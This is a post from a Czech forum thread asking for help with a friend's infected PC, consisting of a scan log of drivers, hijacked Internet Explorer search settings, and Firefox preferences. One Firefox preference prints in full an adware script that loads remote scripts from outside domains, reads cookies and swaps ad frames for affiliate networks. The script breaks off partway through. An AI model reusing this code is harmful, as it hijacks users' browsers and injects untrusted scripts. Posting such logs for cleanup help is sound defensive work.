DRV:64bit: - [2013.08.30 13:45:17 | 000,115,312 | ---- | M] (JMicron Technology Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\JME.sys -- (JME)
DRV:64bit: - [2012.09.03 16:27:46 | 000,038,400 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\facap.sys -- (facap)
DRV:64bit: - [2012.08.23 16:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2012.08.23 16:08:26 | 000,030,208 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2012.03.01 08:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011.06.27 02:37:00 | 002,753,536 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2011.03.11 08:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011.03.11 08:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2011.03.09 23:33:50 | 009,319,424 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atikmdag.sys -- (amdkmdag)
DRV:64bit: - [2011.03.09 22:15:20 | 000,303,616 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atikmpag.sys -- (amdkmdap)
DRV:64bit: - [2010.11.21 05:23:47 | 000,109,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:64bit: - [2010.11.21 05:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010.11.17 08:04:32 | 000,115,216 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AtihdW76.sys -- (AtiHDAudioService)
DRV:64bit: - [2009.09.17 13:54:54 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (HECIx64)
DRV:64bit: - [2009.07.14 03:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009.07.14 03:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009.07.14 03:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009.06.10 22:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009.06.10 22:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009.06.10 22:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009.06.10 22:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009.05.13 10:07:20 | 000,015,928 | ---- | M] (ASUS) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ATK64AMD.sys -- (MTsensor)
DRV - [2009.07.14 03:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
DRV - [2009.07.02 18:36:14 | 000,015,416 | ---- | M] (ASUS) [Kernel | Auto | Running] -- C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\ASMMAP64.sys -- (ASMMAP64)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp ... XX6VE7YP58
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://istart.webssearches.com/web/?typ ... earchTerms}
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://istart.webssearches.com/web/?typ ... earchTerms}
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://istart.webssearches.com/?type=hp ... XX6VE7YP58
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE:64bit: - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://istart.webssearches.com/web/?typ ... earchTerms}
IE:64bit: - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2488}: "URL" = http://dts.search.ask.com/sr?src=ieb&gc ... earchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp ... XX6VE7YP58
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://istart.webssearches.com/web/?typ ... earchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://istart.webssearches.com/web/?typ ... earchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://istart.webssearches.com/?type=hp ... XX6VE7YP58
IE - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://istart.webssearches.com/web/?typ ... earchTerms}
IE - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2488}: "URL" = http://dts.search.ask.com/sr?src=ieb&gc ... earchTerms}


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0



IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp ... XX6VE7YP58
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = https://www.google.cz/
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes,DefaultScope = {70C484D5-0E86-466A-A7C3-8F2907474DA4}
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}: "URL" = http://www.trovi.com/Results.aspx?gd=&c ... rms}&SSPV=
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{043C4499-BA62-4638-B588-88CF1EE1617A}: "URL" = http://slovnik.seznam.cz/?q={searchTerm ... arch_13415
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTer ... ORM=IE11SR
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://istart.webssearches.com/web/?typ ... earchTerms}
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{359FA4C7-FC7E-4768-8D20-C53504680BF1}: "URL" = http://www.novinky.cz/hledej?w={searchT ... arch_13415
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{51192042-E6DA-4D76-9D76-F72D3EB014CE}: "URL" = http://search.seznam.cz/?q={searchTerms ... arch_13415
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{68A797DD-A702-4AE1-B5EC-7690C148383F}: "URL" = http://tv.seznam.cz/hledej?w={searchTer ... arch_13415
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{699436E2-A448-4133-B6A8-6A786FF9FC32}: "URL" = http://slovnik.seznam.cz/?q={searchTerm ... arch_13415
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{70C484D5-0E86-466A-A7C3-8F2907474DA4}: "URL" = http://search.creativetoolbars.com/resu ... earchTerms}
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2488}: "URL" = http://dts.search.ask.com/sr?src=ieb&gc ... earchTerms}
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{B9C15E9D-9175-4597-BC0A-11BC08D40671}: "URL" = http://encyklopedie.seznam.cz/search?q= ... arch_13415
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{CC185CCB-E80B-4DA9-BACA-828E283E7BDD}: "URL" = http://www.firmy.cz/?q={searchTerms}&so ... arch_13415
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{F195EC01-9794-4850-9371-530121AA2DB8}: "URL" = http://www.mapy.cz/?query={searchTerms} ... arch_13415
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..\SearchScopes\{FACB87AC-0D7D-4ED7-883A-10BEB4638815}: "URL" = http://www.zbozi.cz/?q={searchTerms}&r= ... arch_13415
IE - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

========== FireFox ==========
Nahoru
neumimvymysletjmeno
2. Stupeň Varování
Příspěvky: 91
Registrován: 23 čer 2014 12:59

Re: Kámošův pc - havěť

#4 Příspěvek od neumimvymysletjmeno »

FF - prefs.js..browser.search.defaultenginename: "webssearches"
FF - prefs.js..browser.search.selectedEngine: "webssearches"
FF - prefs.js..browser.startup.homepage: "http://istart.webssearches.com/?type=hp ... XX6VE7YP58"
FF - prefs.js..extensions.c6wCv.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam7\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|greatresults|youwillfind|lookforitthere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"sporty-glow.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"avatrade.com\")>-1){return}}catch(e){};new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=990_55501&hid=5215429406649325095&bname=CostMin\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=990_55501&hid=5215429406649325095&bname=CostMin\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(Math.ceil(Math.random()*10)==1){(function(){var a = \"microsoft msn youtube.com ninemsn yahoo maktoob rivals amazon jeuxvideo xbox flickr outlook microsoftstore alltheweb intonow overture tumblr live facebook embedr altavista ashleyfurniturehomestore reddit tripadvisor rightmedia craigslist sprint mozilla att omg.com apple americanexpress\".split(\" \");for(var i=0;i<a.length;i++) if(window.self.location.hostname.indexOf(a)>-1){return};try{if(typeof(localStorage)!='undefined' && (window.self.location.hostname.indexOf('adnxs.com')>-1 || window.self.location.hostname.indexOf('doubleclick')>-1 || window.self.location.hostname.indexOf('cloudfront')>-1)){localStorage.setItem(\"xhxg4sk42hsba\",\"9\")}}catch(e){};var _wlst={lsKey:\"xhxg4sk42hsba\",get:function(b,a){if(window.self.location.protocol==\"https:\" || 3<b)return a(!1);var d=this.fetch();if(d)return a(parseInt(d));if(1==b){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.zilionfast.in/\"+crc+\"/?t=vrt\";(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild(c)}catch(f){}}setTimeout(function(){_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch(b){return 0}else _wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt(c))&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['cpx_bet_55',1340],['ybrant_apn3785',227],['dsnr_dasa2',669],['dsnr_nntbr2',669],['startmeapp_tier2_A',1473],['mari_gen_A',4684],['velis_adr2',269],['matomy_adj49',669]],[['mari_strm_A',4999],['matomy_strm53',5001]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('bS2eQFLx=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"tr.adsplats.com\"||window.self.location.hostname==\"ads.incmd01.com\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=287609')>-1|| _zyad.location.indexOf('=665715')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b&&b.getAttribute(\"name\")){var a=b.getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b.getAttribute(\"content\")}}catch(d){}}catch(c){}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting fuck gangbang orgy gay nude tits tranny blowjob handjob masturbat busty slut joder horny mamada polla cock pussy threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b)||-1<_zyad.title.indexOf(b))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d.hasAttribute(\"s18107640039897562237\"))continue}catch(c){try{if(d.getAttribute(\"s18107640039897562237\"))continue}catch(e){}};try{if(d.src.indexOf('=287609')>-1||d[i].src.indexOf('=665715')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s18107640039897562237\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a.ifr,a.size);b++;a&&a&&\"function\"==typeof a.func&&setTimeout(function(){a.func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d](b);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'bS2eQFLx=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body>&nbsp;\\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body>&nbsp;</body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s18107640039897562237\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(window.self.location.hostname.indexOf('outube.com')>-1 || size=='120x60' ) {return false;};return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/cmp/1412355/inde ... &referrer=', (atp?atp:1), [354,size]);}}catch(e){return !1;}},ybrant_apn3785:function(rsize){try{var size = rsize[0] + 'x' + 